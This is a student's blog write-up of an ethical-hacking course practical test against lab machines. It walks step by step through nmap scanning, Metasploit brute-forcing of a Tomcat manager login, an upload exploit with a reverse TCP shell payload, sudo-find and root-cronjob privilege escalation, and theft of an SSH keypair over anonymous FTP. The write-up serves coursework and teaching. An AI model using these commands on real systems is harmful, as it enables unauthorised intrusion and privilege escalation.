Sign in Subscribe

TP CCD2C03 '24 Apr Sem Practical Test Write-Up

gavintjh

6 min read
TP CCD2C03 '24 Apr Sem Practical Test Write-Up
Disclaimer
The solutions in this write up only applies to classes who received the Virtual Machine (VM) with the Tomcat vulnerability.
ℹ️
This write-up is for educational purposes only. I do not encourage any unethical acts against others without their permission.

hi! this blog will be more relevant to my coursemates taking Ethical Hacking & Intrusion Prevention as one of their modules and have completed the test on 7 June 2024.

we have the following materials provided for the practical test:

  • Test Virtual Machine
  • Kali 2.2 VM

Stage 1

Apache Tomcat Service

first, i identified the network we belong to.

  1. ifconfig
ifconfig output

then, i proceeded to perform network reconnaissance using nmap.

  1. nmap -sV -p- 10.13.13.0/24
nmap output

here, i know that port 8180 is open, running the Apache Tomcat service. knowing this, I proceeded to the "Initial Access" phase. i first prepared metasploit to be used.

  1. service postgresql start - Start the postgresql database service
  2. msfdb init - Initialise Metasploit to use postgresql database
  3. msfconsole - Run Metasploit

i also know that the module used in Metasploit to exploit the Apache Tomcat service is exploit/multi/http/tomcat_mgr_upload . but first, i had to first scan the service against common passwords in order to login and exploit the service successfully. so i first used the scanner/http/tomcat_mgr_login module to retrieve the password.

  1. use scanner/http/tomcat_mgr_login
  2. show options
  3. set RHOSTS 10.13.13.1
  4. set RPORT 8180
scanner/http/tomcat_mgr_login configuration

now that i have configured the module to point at our target's ip 10.13.13.1 at port 8180, we can run the scanner.

  1. run
scanner output, username and password is tomcat

the scanner runs through a list of common passwords, and one of them is correct. the username and password will be used for the next exploit mentioned earlier. once again, i have to configure the RHOSTS and RPORT, but this time we also have to configure the HttpUsername and HttpPassword to tomcat.

  1. use exploit/multi/http/tomcat_mgr_upload
  2. show options
  3. set RHOSTS 10.13.13.1
  4. set RPORT 8180
  5. set HttpUsername tomcat
  6. set HttpPassword tomcat
exploit/multi/http/tomcat_mgr_upload configuration

we also have to change the target so the exploit recognises that we are hacking a linux machine.

  1. set target 2

lastly, we have to configure the payload to use. there is no fixed payload, some works, some don't. for me, i used payload 4 payload/generic/shell_reverse_tcp.

  1. show payloads
  2. set payload 4
  3. exploit or run
successfully gained initial access

i have successfully gained initial access to the service as the user tomcat55 . the low-privilege user's flag is located in /low_flag.txt.

low privilege user flag

in order to escalate privileges to the root user (ideally), i can check for 3 things:

  • Misconfigured Sudo Privileges
  • SUID Bits
  • Vulnerable Cronjobs with unnecessarily high privilege(s)

in this case, i identified the vulnerability to be misconfigured sudo privileges.

  1. sudo -l
/usr/bin/find can be run as sudo without password

after looking into gftobin, i can use find to execute /bin/sh as root.

  1. sudo find . -exec /bin/sh \; -quit

now, every command i run following the above command is run as a root user.

the root flag is located in /root_flag.txt.

root flag

this is stage 1 completed! on to stage 2.

Stage 2

Exposed SSH Key Pair & Cronjob w/ excessive file permissions

for this stage, we are told that the target network is in the 172.13.13.0/24 subnet.

once again, i perform network enumeration on the target.

  1. nmap -sV -p- 172.13.13.0/24
nmap output

from the results, there are 2 networks

  • Internal network : 172.13.13.99
  • External network: 172.13.13.1

now, i want to figure out if how i can exploit the services in the Internal Network. first, i want to figure out if FTP allows anonymous logins. there are a few ways besides directly trying to login as an anonymous user. for my case, i continued to use nmap as i know using the -A tag will expose whether anonymous login is allowed on FTP.

  1. nmap -A -p- 172.13.13.99
nmap output 2, reveals that ftp allows anonymous logins

this output revealed that the FTP service running indeed allows anonymous login.

  1. ftp 172.13.13.99 (username is ftp and password leave as empty)

now, i want to search for any files that may contain sensitive information such as login passwords.

  1. ls -al
output of ls -al

it seems that there is a user called mike.wazowski on the ftp service. this would likely mean the same user will be found in the ssh service i found earlier. (keep a mental note of this) i will enter his directory since i have read permissions and view his files.

  1. cd mike.wazowski
  2. ls -al
ls-al output of mike.wazowski's directory

hidden files are indicated by files/folders starting with . , they may contain sensitive information. however, i am interested in the Downloads folder as it has different permissions from the other directories.

  1. cd Downloads
  2. ls -al
ls -al output of mike.wazowski/Downloads

i have found an SSH keypair i can use to login to the SSH service i found earlier during the network enumeration.

  1. mget ./.keypair keypair
  2. exit

now, in my local kali machine, there should be a file named keypair that i downloaded from the FTP server.

ls output of my local kali machine

before i am able to use the keypair to login, SSH mandates that the keypair file has to be restricted to root-only access.

  1. chmod 600 ./keypair

following which, i can connect to the SSH Server using the keypair.

  1. ssh mike.wazowski@172.13.13.99 -i ./keypair
at the time of writing this write-up from this point onwards, the server that was being used to host the exam was stopped, so i will be relying on my own documentation during the test.

the first flag is found in /low_flag.txt.

  1. cat /low_flag.txt
low_flag.txt

after which, i will perform privilege escalation again by checking through the 3 common vulnerabilities. in this case, the vulnerability is a cronjob with excessive file permissions.

  1. cat /etc/cron.d/*
list of cronjobs

i am interested in the first cronjob running as root every minute bash /tmp/mainfolder/annyeonghaseyo.sh. i tried to cd /tmp/mainfolder, but was unsuccessful. this means that either /tmp or /tmp/mainfolder does not exist.

  1. cd /tmp - since this was successful, it means mainfolder does not exist.
  2. mkdir mainfolder - creates the mainfolder folder

now that the folder is prepared to contain the cronjob file annyeonghaseyo.sh, my only goal left is to obtain the /root_flag.txt file; which means i do not need to be a privileged user since the script runs as root and obtaining the flag file content is simple.

  1. vim annyeonghaseyo.sh

inside the file, we will simply insert the following line of shell code:

cat /root_flag.txt > /tmp/mainfolder/root_flag.txt

this will output the contents from cat /root_flag.txt into a file called root_flag.txt into the /tmp/mainfolder directory without being a root user to begin with; since we established earlier that the cronjob runs as root anyways.

now, i just have to wait another minute or less for the cronjob to run and the root_flag.txt file will be created automatically.

  1. cat /tmp/mainfolder/root_flag.txt
root_flag.txt

and there is the root user's flag!

i hope this helped some of you understand better the thought process behind the exploitation process and help you in your future labs. if there is a re-test, i would highly advise you to try the mock test and CS boxes in preparation. good luck!

Sign up for more like this.

Enter your email
Subscribe